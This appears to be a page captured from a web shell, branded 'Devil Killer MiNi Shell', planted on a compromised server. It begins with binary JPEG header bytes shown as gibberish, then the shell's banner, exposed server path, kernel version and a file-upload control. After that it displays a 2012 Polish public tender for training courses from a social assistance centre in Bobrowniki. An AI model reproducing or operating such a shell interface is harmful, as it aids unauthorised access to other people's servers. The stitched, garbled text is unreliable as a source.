JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20120731/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20120731/278096-N-2012.html

<p class="kh_header"><b>Bobrowniki: Usługi szkoleniowe w ramach projektu systemowego pt. Stop wykluczeniu - czas na aktywność</b><br>
<b>Numer ogłoszenia: 278096 - 2012; data zamieszczenia: 31.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej w Bobrownikach , ul. Nieszawska 10, 87-617 Bobrowniki, woj. kujawsko-pomorskie, tel. 54 2514903, faks 54 2514903.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gopsbobrowniki.bipstrona.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: gminna samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi szkoleniowe w ramach projektu systemowego pt. Stop wykluczeniu - czas na aktywność.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Dla 19 osób, z którymi zawarto kontrakty socjalne: 1.1 Szkolenie: Trening kompetencji społecznych: 2 grupy, w tym I gr. -10 os, II gr. - 9 os., 24 godz.: dla każdej grupy, termin szkolenia: w okresie sierpień - grudzień 2012r., realizacja szkolenia na terenie Bobrownik, w cenie: wyżywienie, materiały szkoleniowe, wynajem sali, obsługa techniczna szkolenia, wykładowca-y, zakres programu szkolenia: poczucie wartości-godności, budowanie postawy asertywnej; sytuacja psychologiczna osoby bezrobotnej; analiza motywacji do pracy, Moje prawa, obrona swoich praw w sytuacjach społecznych, Monolog wewnętrzny- myśli utrudniające podejmowanie aktywności; lęk związany z przyjmowaniem, wyrażaniem i reagowaniem na krytykę; asertywny styl komunikacji w kontaktach pracowniczych i w życiu osobistym; przyczyny i skutki braku akceptacji siebie; wpływ kompleksów społecznych na funkcjonowanie jednostki; radzenie sobie ze stresem; wyrażanie próśb, żądań, oczekiwań i wydawanie poleceń, Wymagania od osoby-osób prowadzącej-ych szkolenie: wykształcenie wyższe, posiadanie kwalifikacji psychologa lub psychoterapeuty lub trenera warsztatu psychologicznego, doświadczenie w realizacji szkoleń, w tym w zakresie niniejszego szkolenia, doświadczenie w pracy z osobami bezrobotnymi zagrożonymi wykluczeniem społecznym. 1.2 Szkolenie: Warsztaty z doradcą zawodowym: 2 grupy, w tym I gr. -10 os, II gr. - 9 os., 24 godz.: dla każdej grupy, termin szkolenia: w okresie sierpień - grudzień 2012r., realizacja szkolenia na terenie Bobrownik, w cenie: wyżywienie, materiały szkoleniowe, wynajem sali, obsługa techniczna szkolenia, wykładowca-y, zakres programu szkolenia: autoprezentacja - sztuka mówienia o sobie; bilans umiejętności zawodowych; dokumenty aplikacyjne i rozmowa kwalifikacyjna; komunikacja; przedsiębiorczość. Wymagania od osoby-osób prowadzącej-ych szkolenie: wykształcenie wyższe w zakresie doradztwa zawodowego lub ukończone studia podyplomowe w zakresie doradztwa zawodowego lub posiadanie licencji doradcy zawodowego I stopnia, doświadczenie w realizacji szkoleń, w tym w zakresie niniejszego szkolenia, doświadczenie w pracy z osobami bezrobotnymi zagrożonymi wykluczeniem społecznym. 1.3 Kurs Brukarz: 3 osoby, 80 godz. (w tym min. 64 godz. zajęć praktycznych), termin kursu: w okresie wrzesień - grudzień 2012r., realizacja kursu na terenie powiatu lipnowskiego lub powiatu włocławskiego (w wyjątkowych sytuacjach Zamawiający dopuszcza realizację kursu poza terenem wymienionych powiatów), w cenie kursu: wyżywienie, materiały szkoleniowe, wynajem sali, obsługa techniczna kursu, zajęcia praktyczne odbywać się muszą z użyciem odpowiednich materiałów i narzędzi w tym: m. in. zagęszczarka, szpadle, łopaty, poziomice oraz kostka brukowa - różne kolory i kształty, krawężniki, cement, żwir lub tłuczeń w zależności od podłoża, zakres programu kursu: zasady bezpieczeństwa i higieny pracy przy procesach brukarskich, materiały stosowane w brukarstwie: kruszywa mineralne, skały, spoiwa mineralne: cement i inne, technologie wykonywania nawierzchni brukowych, narzędzia i urządzenia do robót brukarskich, wyroby z materiałów kamiennych i ich cechy techniczne, przygotowanie kursanta do pracy: instruktarz stanowiskowy, usuwanie humusu i montaż obrzeży, usypywanie podbudowy i zagęszczanie, przykłady rozwiązań technologicznych dróg i chodników, układanie kostki brukowej: rodzaje, możliwości, układanie kostki brukowej: wzory i sposoby, zagęszczanie, sprzątanie stanowiska pracy, egzamin, Wymagania od osoby-osób  prowadzącej-ych kurs: wykształcenie min. średnie i-lub  doświadczenie zawodowe odpowiadające charakterowi kursu i- lub doświadczenie w realizacji kursów i szkoleń, w tym w zakresie niniejszego kursu; 1.4 Kurs Pomoc kuchenna z elementami dekoracji stołów: 2 osoby, 60 godz. (w tym min. 56 godz. zajęć praktycznych), termin kursu: w okresie sierpień - grudzień 2012r., realizacja kursu na terenie Bobrownik, w cenie kursu: wyżywienie na zajęciach teoretycznych, materiały szkoleniowe, wynajem sali na zajęcia teoretyczne i praktyczne, obsługa techniczna kursu,  zakres programu kursu: zasady żywienia, BHP w małej gastronomii i gospodarstwie domowym, obróbka wstępna i cieplna surowców, sposoby dekorowania i podawania potraw, charakterystyka i zastosowanie w produkcji kulinarnej warzyw, ziemniaków, grzybów i owoców, przygotowywanie zup, potraw mięsnych (wieprzowe, wołowe, drobiowe), potraw mącznych, potraw rybnych, sałatek, surówek, deserów, pieczenie ciast, ustawianie stołów, dekoracja stołów, podstawowe i rozszerzone nakrycia, Wymagania od osoby-osób prowadzącej-ych kurs: wykształcenie min. średnie i-lub doświadczenie zawodowe odpowiadające charakterowi kursu i-lub doświadczenie w realizacji kursów i szkoleń, w tym w zakresie niniejszego kursu, 1.5 Kurs Kadry i płace: 3 osoby, 80 godz. ( w tym min. 64 godz. zajęć praktycznych), termin kursu: w okresie sierpień - grudzień 2012r., realizacja kursu na terenie miasta Lipno lub Włocławek, w cenie kursu: wyżywienie, materiały dydaktyczne, wynajem sali z dostępem do internetu, stanowiska komputerowe na zajęcia praktyczne z programem kadrowo - płacowym (w tym 1 komputer stacjonarny lub laptop na 1 uczestnika kursu), obsługa techniczna kursu, zakres programu kursu, w tym m.in.: prawo pracy, rozliczanie wynagrodzeń, podatek dochodowy od osób fizycznych, ubezpieczenia zdrowotne i społeczne, rozliczenia podróży służbowych, program PŁATNIK, wykorzystanie programu Excel w tworzeniu listy płac, Wymagania od osoby-osób  prowadzącej-ych kurs: wykształcenie wyższe i-lub doświadczenie zawodowe odpowiadające charakterowi kursu i-lub doświadczenie w realizacji kursów i szkoleń, w tym w zakresie niniejszego kursu; 1.6  Kurs Sprzedawca z obsługą kasy fiskalnej: liczba osób: 8, 40 godz. (w tym min. 16 godz. praktyki), termin kursu: w okresie sierpień - grudzień 2012r., realizacja kursu na terenie miasta Lipno lub Włocławek, w cenie kursu: wyżywienie, materiały dydaktyczne, wynajem sali, wykładowca-y, obsługa techniczna kursu, sala musi być wyposażona w odpowiednią liczbę kas fiskalnych (1 kasa na 1 uczestnika), zakres programu kursu: istota sprzedaży; zadania handlu, jego specyfikacja; lokal handlowy (wyposażenie, wnętrze); reklama; obsługa klienta, strategie negocjacyjne, narzędzia komunikacji; badanie potrzeb klienta; profil profesjonalnego sprzedawcy; ścieżka sprzedaży; ceny netto i brutto; obliczanie podatku VAT; sztuka efektywnej sprzedaży, wyliczanie zysku; towaroznawstwo w pracy nowoczesnego sprzedawcy, urządzenia fiskalne (rodzaje urządzeń, zasady pracy, podstawy prawne wprowadzenia urządzeń fiskalnych, zasady serwisowania, praktyczne wykorzystanie urządzeń fiskalnych, wykonanie raportów i sprawozdań), Wymagania od osoby-osób prowadzącej-ych kurs: wykształcenie minimum średnie, kwalifikacje pedagogiczne, w przypadku osoby prowadzącej zajęcia praktyczne - minimum 3 letnie doświadczenie zawodowe w obsłudze kas fiskalnych, doświadczenie w realizacji kursów i szkoleń, w tym w zakresie niniejszego kursu, doświadczenie w pracy z osobami dorosłymi lub bezrobotnymi zagrożonymi wykluczeniem społecznym; 1.7 Kurs Prawo jazdy kat. B: 8 osób, 60 godz. (w tym 30 godz. praktyki), termin kursu: w okresie sierpień - grudzień 2012r., realizacja kursu na terenie miasta Włocławek (w przypadku realizacji kursu we Włocławku czas dojazdu i przyjazdu z Włocławka na zajęciach praktycznych nie wlicza się w godziny kursu), w cenie kursu: wyżywienie na zajęciach teoretycznych, materiały szkoleniowe, wynajem sali na zajęcia teoretyczne, plac manewrowy do zajęć praktycznych, badanie lekarskie, instruktorzy nauki jazdy, jednorazowe podejście do egzaminu teoretycznego i praktycznego w WORD, obsługa techniczna kursu, zakres programu kursu zgodny z Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005r. w sprawie szkolenia, egzaminowania i uzyskania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz.U. z 2005r. Nr 217, poz. 1834, zm. Dz.U. z 2006r.Nr 3 poz. 24, z późn. zmianami), Wymagania od instruktorów: minimum 3 letnie doświadczenie w realizacji kursów prawa jazdy kat. B, instruktorzy powinni posiadać kwalifikacje instruktorskie (Państwowy Egzamin Instruktorski) co najmniej w zakresie prawa jazdy kat. B; 1.8 Kurs Prawo jazdy kat. C: 1 osoba, 50 godz. (w tym 30 godz. praktyki), termin kursu: w okresie sierpień - grudzień 2012r., realizacja kursu na terenie miasta Włocławek (w przypadku realizacji kursu we Włocławku czas dojazdu i przyjazdu z Włocławka na zajęciach praktycznych nie wlicza się w godziny kursu), w cenie kursu: wyżywienie na zajęciach teoretycznych, materiały szkoleniowe, wynajem sali na zajęcia teoretyczne, plac manewrowy do zajęć praktycznych badanie lekarskie, instruktorzy nauki jazdy, jednorazowe podejście do egzaminu teoretycznego i praktycznego w WORD, obsługa techniczna kursu, zakres programu kursu zgodny z Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005r. w sprawie szkolenia, egzaminowania i uzyskania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz.U. z 2005r. Nr 217, poz. 1834, zm. Dz.U. z 2006r.Nr 3 poz. 24, z późn. zmianami), Wymagania od instruktorów: minimum 3 letnie doświadczenie w realizacji kursów prawa jazdy kat. C, instruktorzy powinni posiadać kwalifikacje instruktorskie (Państwowy Egzamin Instruktorski) co najmniej w zakresie prawa jazdy kat. C; 1.9 Kurs Operator koparko - ładowarki: 1 osoba, 202 godz. (w tym minimum 86 godz. zajęć praktycznych), termin kursu: w okresie sierpień - grudzień 2012r., realizacja kursu na terenie miasta Włocławek, w cenie kursu: wyżywienie na zajęciach teoretycznych, materiały dydaktyczne, wynajem sali na zajęcia teoretyczne, zwrot kosztów dojazdu, badanie lekarskie, jednorazowe podejście do egzaminu przed komisją powołaną przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie, obsługa techniczna kursu, zajęcia praktyczne muszą być prowadzone na placu manewrowym z odpowiednim sprzętem, program kursu musi być zgodny z Rozporządzeniem Ministra Gospodarki z dnia 20 września 2001r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. z 2001r. Nr 118 poz.1263), zakres programu kursu: użytkowanie eksploatacyjne, dokumentacja techniczna, przeszkolenie w zakresie BHP, podstawy elektrotechniki, silniki spalinowe, elementy hydrauliki, technologia robót, budowa maszyn, egzamin, Wymagania od osoby-osób prowadzącej-ych kurs: min. 3-letnie doświadczenie w realizacji kursów i szkoleń, w tym w zakresie niniejszego kursu, doświadczenie w pracy z osobami dorosłymi lub bezrobotnymi zagrożonymi wykluczeniem społecznym, przy zajęciach praktycznych uprawnienia operatora koparko - ładowarki, minimum roczne doświadczenie jako instruktor praktycznej nauki zawodu, przy zajęciach teoretycznych kwalifikacje pedagogiczne. 2.Dla 8 osób, z którymi zawarto umowy o udzielenie wsparcia w ramach Programu Aktywności Lokalnej: 2.1 Szkolenie: Trening kompetencji społecznych: 1 grupa - 8 osób, 16 godz., termin szkolenia: w okresie wrzesień - grudzień 2012r., realizacja szkolenia na terenie Bobrownik, w cenie: wyżywienie, materiały szkoleniowe, wynajem sali, obsługa techniczna szkolenia, wykładowca-y,  zakres programu szkolenia:  budowanie postawy asertywnej; sytuacja psychologiczna osoby bezrobotnej; analiza motywacji do pracy, obrona swoich praw w sytuacjach społecznych, akceptacja siebie; radzenie sobie ze stresem; wyrażanie próśb, żądań, oczekiwań i wydawanie poleceń, poczucie wartości-godności osoby bezrobotnej, Wymagania od osoby-osób prowadzącej-ych szkolenie: wykształcenie wyższe, posiadanie kwalifikacji psychologa lub psychoterapeuty lub trenera warsztatu psychologicznego lub trenera i edukatora w zakresie edukacji psychospołecznej, doświadczenie w realizacji szkoleń, w tym w zakresie niniejszego szkolenia, doświadczenie w pracy z osobami bezrobotnymi zagrożonymi wykluczeniem społecznym; 2.2 Szkolenie: Warsztaty interpersonalne: 1 grupa - 8 osób, 16 godz., termin szkolenia: w okresie wrzesień - grudzień 2012r., realizacja szkolenia na terenie Bobrownik, w cenie: wyżywienie, materiały szkoleniowe, wynajem sali, obsługa techniczna szkolenia, wykładowca-y,  zakres programu szkolenia: postawa lękowa, bezradna, pasywna i roszczeniowa (jak ją przełamać), komunikacja interpersonalna, autoprezentacja, techniki budowania i utrzymywania kontaktu, język ciała, wywieranie wpływu, motywowanie siebie, Wymagania od osoby-osób prowadzącej-ych szkolenie: wykształcenie wyższe, posiadanie kwalifikacji psychologa lub psychoterapeuty lub trenera warsztatu psychologicznego lub trenera i edukatora w zakresie edukacji psychospołecznej, doświadczenie w realizacji szkoleń, w tym w zakresie niniejszego szkolenia, doświadczenie w pracy z osobami bezrobotnymi zagrożonymi wykluczeniem społecznym; 2.3 Szkolenie Warsztaty rękodzieła artystycznego (w zakresie sztucznej biżuterii): 1 grupa - 8 osób, 24 godz., termin szkolenia: w okresie wrzesień - grudzień 2012r., realizacja szkolenia na terenie Bobrownik, w cenie kursu: wyżywienie, materiały szkoleniowe i narzędzia do zajęć praktycznych, wynajem sali, obsługa techniczna szkolenia, wykładowca-y- szkolenie ma dotyczyć wyrobów ze sztucznej biżuterii, sala musi być wyposażona w odpowiednią liczbę stanowisk (1 stanowisko dla 1 uczestnika), a każde stanowisko w: imadełko, kowadełko, szlifierka wielofunkcyjna, palnik gazowy, lupa, pistolet elektryczny do kleju, podłączenie do zasilania energii elektrycznej; każdy uczestnik musi być wyposażony w zestaw narzędzi: szczypce płaskie i okrągłe, przecinak, pilniki do metali - płaski, półokrągły, trójkątny, kwadratowy i okrągły, młotki 30 i 60 gr, nożyce do blachy, szczypce do profilowania zaokrągleń, zestaw pęset, igły do nawlekania, szydełka, zakres programu kursu: wprowadzenie w zagadnienia wytwarzania sztucznej biżuterii; zdobnictwo, poszukiwanie motywów; narzędzia - omówienie i klasyfikacja; akcesoria do wykonywania ozdób; elementy montażowe do wykonywania biżuterii; ćwiczenia: wykonywanie biżuterii z metaloplastyki (broszki, kolczyki, naszyjniki, bransoletki); ekobiżuteria (drewno, sznurek, skóra ekologiczna - ćwiczenia: wykonanie ekobiżuterii), Wymagania od osoby-osób prowadzącej-ych kurs: wykształcenie minimum średnie i-lub doświadczenie zawodowe odpowiadające charakterowi kursu i- lub doświadczenie w realizacji kursów i szkoleń, w tym w zakresie niniejszego kursu. 2.4 Kurs Pomoc kuchenna z elementami dekoracji stołów: 8 osób,  60 godz. (w tym min. 56 godz. zajęć praktycznych), termin kursu: w okresie wrzesień - grudzień 2012r., realizacja kursu na terenie Bobrownik, w cenie kursu: wyżywienie na zajęciach teoretycznych, materiały szkoleniowe, wynajem sali na zajęcia teoretyczne i praktyczne, obsługa techniczna kursu,  zakres programu kursu: zasady żywienia, BHP w małej gastronomii i gospodarstwie domowym, obróbka wstępna i cieplna surowców, sposoby dekorowania i podawania potraw, charakterystyka i zastosowanie w produkcji kulinarnej warzyw, ziemniaków, grzybów i owoców, przygotowywanie zup, potraw mięsnych (wieprzowe, wołowe, drobiowe), potraw mącznych, potraw rybnych, sałatek, surówek, deserów, pieczenie ciast, ustawianie stołów, dekoracja stołów, podstawowe i rozszerzone nakrycia; Wymagania od osoby-osób  prowadzącej-ych kurs: wykształcenie min. średnie i-lub doświadczenie zawodowe odpowiadające charakterowi kursu i-lub doświadczenie w realizacji kursów i szkoleń, w tym w zakresie niniejszego kursu.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość przeprowadzenia zamówień uzupełniających do 10 % wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 70.22.00.00-9, 55.32.10.00-6, 55.52.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże na podstawie dołączonych do oferty dokumentów, że posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy nakładają obowiązek ich posiadania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 2 usługi w zakresie zgodnym z opisem przedmiotu zamówienia każda z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że usługi te zostały wykonane należycie lub są wykonywane należycie - załącznik nr 6 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje osobami przewidzianymi do realizacji zamówienia lub dysponuje pisemnym zobowiązaniem innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia zgodnie z wymaganiami zawartymi w załączniku nr 1 do SIWZ wraz z podaniem informacji na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami- załącznik nr 7 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje sposobu dokonywania oceny spełnienia ww. warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Dokumenty potwierdzające uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy nakładają obowiązek ich posiadania.
2. Formularz ofertowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 25</li>
<li>2 - Doświadczenie Wykonawcy w realizacji treningu kompetencji społecznych - 5</li>
<li>3 - Doświadczenie Wykonawcy w realizacji warsztatów z doradcą zawodowym - 5</li>
